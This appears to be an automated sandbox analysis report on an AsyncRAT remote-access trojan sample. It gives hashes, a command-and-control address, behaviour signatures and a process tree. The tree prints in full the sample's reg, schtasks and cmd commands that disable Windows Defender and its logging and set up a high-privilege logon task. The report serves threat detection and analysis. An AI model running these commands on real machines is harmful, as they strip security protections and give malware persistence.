Resubmissions

28-06-2024 21:31

240628-1dj7rswanm 10

28-06-2024 21:30

240628-1cwjeasfjf 10

28-06-2024 21:23

240628-z8y4qssdrg 10

28-06-2024 21:14

240628-z3lw8avfpn 10

Analysis

  • max time kernel
    159s
  • max time network
    166s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28-06-2024 21:23

General

  • Target

    test.exe

  • Size

    101KB

  • MD5

    8eab3abc6963ebf4446c5e5aa559f1d4

  • SHA1

    5901818505035554b05204b2575aebfcde196d35

  • SHA256

    d01b020acbaee9457d161a79b852932cc192a2dde3d47ac14292eab667aee068

  • SHA512

    d55786d83c067fbe8d39537496979b3a3fb92ee87b16f39caa0795c9eef1eb7d354636058569c870a93e8f1888c6f3ee5e75d978dda9b31ae062de47fb306432

  • SSDEEP

    3072:gvGyYiSDnt1lD5ScJk3sVkwqAOOwOfHQ:E41YCQ/lhVOfw

Malware Config

Extracted

Family

asyncrat

Version

1.0.7

Botnet

Default

C2

127.0.0.1:8848

185.188.183.18:8848

Mutex

DbNvcWoLvbqX

Attributes
  • delay

    1

  • install

    true

  • install_file

    csrss.exe

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 25 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 5 IoCs
  • Modifies security service 2 TTPs 2 IoCs
  • Async RAT payload 1 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 6 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Delays execution with timeout.exe 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\test.exe
    "C:\Users\Admin\AppData\Local\Temp\test.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:2296
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c main.bat
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:336
      • C:\Windows\system32\openfiles.exe
        openfiles
        3⤵
          PID:2448
        • C:\Windows\system32\reg.exe
          reg add "HKLM\Software\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f
          3⤵
          • Modifies Windows Defender notification settings
          PID:4012
        • C:\Windows\system32\reg.exe
          reg add "HKLM\Software\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications " /t REG_DWORD /d "1" /f
          3⤵
            PID:1136
          • C:\Windows\system32\reg.exe
            reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d "0" /f
            3⤵
              PID:3948
            • C:\Windows\system32\reg.exe
              reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
              3⤵
                PID:3464
              • C:\Windows\system32\reg.exe
                reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "AllowFastServiceStartup" /t REG_DWORD /d "0" /f
                3⤵
                  PID:2576
                • C:\Windows\system32\reg.exe
                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                  3⤵
                    PID:5108
                  • C:\Windows\system32\reg.exe
                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                    3⤵
                      PID:4744
                    • C:\Windows\system32\reg.exe
                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableSpecialRunningModes" /t REG_DWORD /d "1" /f
                      3⤵
                        PID:864
                      • C:\Windows\system32\reg.exe
                        reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "ServiceKeepAlive" /t REG_DWORD /d "0" /f
                        3⤵
                          PID:368
                        • C:\Windows\system32\reg.exe
                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                          3⤵
                            PID:2240
                          • C:\Windows\system32\reg.exe
                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                            3⤵
                            • Modifies Windows Defender Real-time Protection settings
                            PID:1004
                          • C:\Windows\system32\reg.exe
                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                            3⤵
                            • Modifies Windows Defender Real-time Protection settings
                            PID:2564
                          • C:\Windows\system32\reg.exe
                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                            3⤵
                            • Modifies Windows Defender Real-time Protection settings
                            PID:836
                          • C:\Windows\system32\reg.exe
                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                            3⤵
                            • Modifies Windows Defender Real-time Protection settings
                            PID:2500
                          • C:\Windows\system32\reg.exe
                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "1" /f
                            3⤵
                            • Modifies Windows Defender Real-time Protection settings
                            PID:2880
                          • C:\Windows\system32\reg.exe
                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                            3⤵
                            • Modifies Windows Defender Real-time Protection settings
                            PID:2852
                          • C:\Windows\system32\reg.exe
                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                            3⤵
                              PID:1032
                            • C:\Windows\system32\reg.exe
                              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                              3⤵
                                PID:5028
                              • C:\Windows\system32\reg.exe
                                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                                3⤵
                                  PID:492
                                • C:\Windows\system32\reg.exe
                                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
                                  3⤵
                                    PID:1064
                                  • C:\Windows\system32\reg.exe
                                    reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                                    3⤵
                                      PID:4392
                                    • C:\Windows\system32\reg.exe
                                      reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                                      3⤵
                                        PID:3972
                                      • C:\Windows\system32\schtasks.exe
                                        schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                        3⤵
                                          PID:1784
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                          3⤵
                                            PID:3920
                                          • C:\Windows\system32\schtasks.exe
                                            schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                            3⤵
                                              PID:3720
                                            • C:\Windows\system32\schtasks.exe
                                              schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                              3⤵
                                                PID:4856
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                                3⤵
                                                  PID:3420
                                                • C:\Windows\system32\reg.exe
                                                  reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
                                                  3⤵
                                                    PID:4484
                                                  • C:\Windows\system32\reg.exe
                                                    reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
                                                    3⤵
                                                      PID:4476
                                                    • C:\Windows\system32\reg.exe
                                                      reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                                                      3⤵
                                                        PID:4628
                                                      • C:\Windows\system32\reg.exe
                                                        reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                                                        3⤵
                                                          PID:3140
                                                        • C:\Windows\system32\reg.exe
                                                          reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                                                          3⤵
                                                            PID:688
                                                          • C:\Windows\system32\reg.exe
                                                            reg add "HKLM\System\CurrentControlSet\Services\MDCoreSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                            3⤵
                                                              PID:4844
                                                            • C:\Windows\system32\reg.exe
                                                              reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                                              3⤵
                                                                PID:3776
                                                              • C:\Windows\system32\reg.exe
                                                                reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                                                3⤵
                                                                  PID:4908
                                                                • C:\Windows\system32\reg.exe
                                                                  reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                                  3⤵
                                                                    PID:1576
                                                                  • C:\Windows\system32\reg.exe
                                                                    reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                                                    3⤵
                                                                    • Modifies security service
                                                                    PID:1624
                                                                  • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dllhost.exe
                                                                    dllhost.exe
                                                                    3⤵
                                                                    • Checks computer location settings
                                                                    • Executes dropped EXE
                                                                    PID:4784
                                                                    • C:\Users\Admin\AppData\Local\Temp\svchost.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
                                                                      4⤵
                                                                      • Checks computer location settings
                                                                      • Executes dropped EXE
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:3080
                                                                      • C:\Windows\System32\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "csrss" /tr '"C:\Users\Admin\AppData\Roaming\csrss.exe"' & exit
                                                                        5⤵
                                                                          PID:2068
                                                                          • C:\Windows\system32\schtasks.exe
                                                                            schtasks /create /f /sc onlogon /rl highest /tn "csrss" /tr '"C:\Users\Admin\AppData\Roaming\csrss.exe"'
                                                                            6⤵
                                                                            • Scheduled Task/Job: Scheduled Task
                                                                            PID:1060
                                                                        • C:\Windows\system32\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpA505.tmp.bat""
                                                                          5⤵
                                                                            PID:4036
                                                                            • C:\Windows\system32\timeout.exe
                                                                              timeout 3
                                                                              6⤵
                                                                              • Delays execution with timeout.exe
                                                                              PID:1624
                                                                            • C:\Users\Admin\AppData\Roaming\csrss.exe
                                                                              "C:\Users\Admin\AppData\Roaming\csrss.exe"
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:2032
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1016 --field-trial-handle=2244,i,11878111470816612087,2265290141962607370,262144 --variations-seed-version /prefetch:8
                                                                    1⤵
                                                                      PID:2384
                                                                    • C:\Windows\System32\rundll32.exe
                                                                      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                      1⤵
                                                                        PID:2016
                                                                      • C:\Users\Admin\AppData\Local\Temp\svchost.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
                                                                        1⤵
                                                                        • Executes dropped EXE
                                                                        PID:4908
                                                                      • C:\Users\Admin\AppData\Local\Temp\test.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\test.exe"
                                                                        1⤵
                                                                        • Adds Run key to start application
                                                                        PID:3192
                                                                        • C:\Windows\SYSTEM32\cmd.exe
                                                                          cmd /c main.bat
                                                                          2⤵
                                                                            PID:2908
                                                                            • C:\Windows\system32\openfiles.exe
                                                                              openfiles
                                                                              3⤵
                                                                                PID:4744
                                                                              • C:\Windows\system32\reg.exe
                                                                                reg add "HKLM\Software\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f
                                                                                3⤵
                                                                                • Modifies Windows Defender notification settings
                                                                                PID:4000
                                                                              • C:\Windows\system32\reg.exe
                                                                                reg add "HKLM\Software\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications " /t REG_DWORD /d "1" /f
                                                                                3⤵
                                                                                  PID:1004
                                                                                • C:\Windows\system32\reg.exe
                                                                                  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d "0" /f
                                                                                  3⤵
                                                                                    PID:216
                                                                                  • C:\Windows\system32\reg.exe
                                                                                    reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
                                                                                    3⤵
                                                                                    • Modifies Windows Defender Real-time Protection settings
                                                                                    PID:1332
                                                                                  • C:\Windows\system32\reg.exe
                                                                                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "AllowFastServiceStartup" /t REG_DWORD /d "0" /f
                                                                                    3⤵
                                                                                      PID:4500
                                                                                    • C:\Windows\system32\reg.exe
                                                                                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                                                                                      3⤵
                                                                                        PID:4528
                                                                                      • C:\Windows\system32\reg.exe
                                                                                        reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                                                                                        3⤵
                                                                                          PID:1140
                                                                                        • C:\Windows\system32\reg.exe
                                                                                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableSpecialRunningModes" /t REG_DWORD /d "1" /f
                                                                                          3⤵
                                                                                            PID:756
                                                                                          • C:\Windows\system32\reg.exe
                                                                                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "ServiceKeepAlive" /t REG_DWORD /d "0" /f
                                                                                            3⤵
                                                                                              PID:4484
                                                                                            • C:\Windows\system32\reg.exe
                                                                                              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                                                                                              3⤵
                                                                                                PID:1968
                                                                                              • C:\Windows\system32\reg.exe
                                                                                                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                                                                                                3⤵
                                                                                                • Modifies Windows Defender Real-time Protection settings
                                                                                                PID:2924
                                                                                              • C:\Windows\system32\reg.exe
                                                                                                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                                                                                                3⤵
                                                                                                • Modifies Windows Defender Real-time Protection settings
                                                                                                PID:3644
                                                                                              • C:\Windows\system32\reg.exe
                                                                                                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                                                                                                3⤵
                                                                                                • Modifies Windows Defender Real-time Protection settings
                                                                                                PID:1804
                                                                                              • C:\Windows\system32\reg.exe
                                                                                                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                                                                                                3⤵
                                                                                                • Modifies Windows Defender Real-time Protection settings
                                                                                                PID:4480
                                                                                              • C:\Windows\system32\reg.exe
                                                                                                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "1" /f
                                                                                                3⤵
                                                                                                • Modifies Windows Defender Real-time Protection settings
                                                                                                PID:4244
                                                                                              • C:\Windows\system32\reg.exe
                                                                                                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                                                                                                3⤵
                                                                                                • Modifies Windows Defender Real-time Protection settings
                                                                                                PID:3800
                                                                                              • C:\Windows\system32\reg.exe
                                                                                                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                                                                                                3⤵
                                                                                                  PID:3848
                                                                                                • C:\Windows\system32\reg.exe
                                                                                                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                                                                                                  3⤵
                                                                                                    PID:4340
                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                                                                                                    3⤵
                                                                                                      PID:3156
                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
                                                                                                      3⤵
                                                                                                        PID:4304
                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                        reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                                                        3⤵
                                                                                                          PID:688
                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                          reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                                                          3⤵
                                                                                                            PID:4560
                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                            schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                                                                                            3⤵
                                                                                                              PID:4968
                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                              schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                                                                                              3⤵
                                                                                                                PID:4316
                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                                                                                                3⤵
                                                                                                                  PID:1848
                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                  schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                                                                                                  3⤵
                                                                                                                    PID:4608
                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                                                                                                    3⤵
                                                                                                                      PID:4744
                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                      reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
                                                                                                                      3⤵
                                                                                                                        PID:2500
                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                        reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
                                                                                                                        3⤵
                                                                                                                          PID:216
                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                          reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                                                                                                                          3⤵
                                                                                                                            PID:3004
                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                            reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                                                                                                                            3⤵
                                                                                                                              PID:384
                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                              reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                                                                                                                              3⤵
                                                                                                                                PID:1140
                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                reg add "HKLM\System\CurrentControlSet\Services\MDCoreSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                3⤵
                                                                                                                                  PID:1336
                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                  reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                  3⤵
                                                                                                                                    PID:936
                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                    reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                    3⤵
                                                                                                                                      PID:2924
                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                      reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                      3⤵
                                                                                                                                        PID:3644
                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                        reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                        3⤵
                                                                                                                                        • Modifies security service
                                                                                                                                        PID:1804
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dllhost.exe
                                                                                                                                        dllhost.exe
                                                                                                                                        3⤵
                                                                                                                                        • Checks computer location settings
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        PID:5104
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\svchost.exe
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
                                                                                                                                          4⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          PID:3312

                                                                                                                                  Network

                                                                                                                                  MITRE ATT&CK Enterprise v15

                                                                                                                                  Replay Monitor

                                                                                                                                  Loading Replay Monitor...

                                                                                                                                  Downloads

                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost.exe.log

                                                                                                                                    Filesize

                                                                                                                                    425B

                                                                                                                                    MD5

                                                                                                                                    fff5cbccb6b31b40f834b8f4778a779a

                                                                                                                                    SHA1

                                                                                                                                    899ed0377e89f1ed434cfeecc5bc0163ebdf0454

                                                                                                                                    SHA256

                                                                                                                                    b8f7e4ed81764db56b9c09050f68c5a26af78d8a5e2443e75e0e1aa7cd2ccd76

                                                                                                                                    SHA512

                                                                                                                                    1a188a14c667bc31d2651b220aa762be9cce4a75713217846fbe472a307c7bbc6e3c27617f75f489902a534d9184648d204d03ee956ac57b11aa90551248b8f9

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dllhost.exe

                                                                                                                                    Filesize

                                                                                                                                    90KB

                                                                                                                                    MD5

                                                                                                                                    f75acc31206c792c4831f9aa52404b2b

                                                                                                                                    SHA1

                                                                                                                                    c1380e151eba78a3ec395f46d76fbcd273c10afe

                                                                                                                                    SHA256

                                                                                                                                    7aaa38f2e289da72c6dc9b61d4951f34badc693798560f69ad42944eb470dbfd

                                                                                                                                    SHA512

                                                                                                                                    80614ccd2823c429867a421ca0464ed088f474c2399681be398982a440112fa1683680a2f4cf496bec98f23792ea5a74ece95fd0741499b9389a98ab72c5a72f

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\main.bat

                                                                                                                                    Filesize

                                                                                                                                    4KB

                                                                                                                                    MD5

                                                                                                                                    ea021e4f2f77ebf4e02a39c82172e240

                                                                                                                                    SHA1

                                                                                                                                    98f921e1b0d0a1273fb1c9e9dcf6245cbd92c91a

                                                                                                                                    SHA256

                                                                                                                                    c7c390518a2d06e2567eca287925058bcb8bc466cffe4c210fec0f9664f5bcde

                                                                                                                                    SHA512

                                                                                                                                    7f201842a37cd57751d800a950beb5369e010f6dae34b6241db1b9e3b64c86bfe30c2116039a0f8a80bc79bd8371dd707140a9fe564e6468c4accb1eb3861d65

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\svchost.exe

                                                                                                                                    Filesize

                                                                                                                                    48KB

                                                                                                                                    MD5

                                                                                                                                    ee7346d7b4db0921b8e859072b561514

                                                                                                                                    SHA1

                                                                                                                                    6c0ccc2bab163fdabe93d9e7ae5a6d723a422709

                                                                                                                                    SHA256

                                                                                                                                    7ef4770b47759c0b35cf97edca41ff0d6a61265a4cf910e7454b46a915218deb

                                                                                                                                    SHA512

                                                                                                                                    a1e04022702df848dad96ec28cb91fc9515b0ea03b1ed7f93deb8001e9a2efe4b49ac4ce848679cb591faf45505db6716cb5afe60f7754ba7a96d52cf595833f

                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\tmpA505.tmp.bat

                                                                                                                                    Filesize

                                                                                                                                    149B

                                                                                                                                    MD5

                                                                                                                                    d2c0af9ac36786c859b82a282797550e

                                                                                                                                    SHA1

                                                                                                                                    f2c0378248d92f6c48d01b442dbcf6af0f6d2aa7

                                                                                                                                    SHA256

                                                                                                                                    823f24782dc2fee896a93d431fcbec008935c2e7b836cd8d75ebf982e840a375

                                                                                                                                    SHA512

                                                                                                                                    7fce5adf54a1152cbc93c9de7e3f12029e44730b97f62eacde183dad82ac8173019dca27b4464b15103be2319ed4cbd51bd847dafa73dfc71e2ad68b08bf05a3

                                                                                                                                  • memory/2032-35-0x000000001DE10000-0x000000001DE86000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    472KB

                                                                                                                                  • memory/2032-36-0x000000001DC80000-0x000000001DC90000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    64KB

                                                                                                                                  • memory/2032-37-0x000000001DDB0000-0x000000001DDCE000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    120KB

                                                                                                                                  • memory/3080-23-0x0000000000BE0000-0x0000000000BF2000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    72KB

                                                                                                                                  • memory/4784-8-0x0000000000400000-0x000000000041D000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    116KB

                                                                                                                                  • memory/4784-24-0x0000000000400000-0x000000000041D000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    116KB

                                                                                                                                  • memory/5104-58-0x0000000000400000-0x000000000041D000-memory.dmp

                                                                                                                                    Filesize

                                                                                                                                    116KB